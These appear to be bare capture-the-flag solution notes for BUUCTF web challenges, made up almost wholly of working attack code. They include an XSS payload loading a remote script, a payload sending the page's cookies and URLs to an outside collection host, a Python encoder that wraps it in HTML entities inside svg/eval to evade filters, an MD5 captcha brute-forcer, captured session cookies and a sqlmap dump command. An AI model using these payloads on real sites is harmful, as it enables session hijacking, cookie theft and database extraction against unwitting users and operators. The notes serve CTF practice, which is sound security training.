BUU XSS COURSE 1:
</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F3MGcXr%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));
cookie : PHPSESSID=aa9ffcc1c0a1023a58fe12ca9c37088e
[CISCN2019 华东北赛区] Web2:
(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcXr&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcXr&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
output = ""
for c in in_str:
output += "&#" + str(ord(c))
print("<svg><script>eval("" + output + "")</script>")
<svg><script>eval("(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcXr&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();")</script>
import hashlib
for i in range(1,100000000000):
s = hashlib.md5(str(i).encode("utf-8")).hexdigest()[0:6]
if s == "d5bd44":
print(i)
break
http://web/post/b2b166821b1e6c820f7b10dc35ea3568.html
PHPSESSID=5259aace979bfed1713367666f3483a4
sqlmap -u "http://89d2c8a1-39da-4f93-a59a-ce14d39f3c28.node4.buuoj.cn:81/admin.php?id=1" --cookie="PHPSESSID=5259aace979bfed1713367666f3483a4" -T flag --dump --flush-session --fresh-queries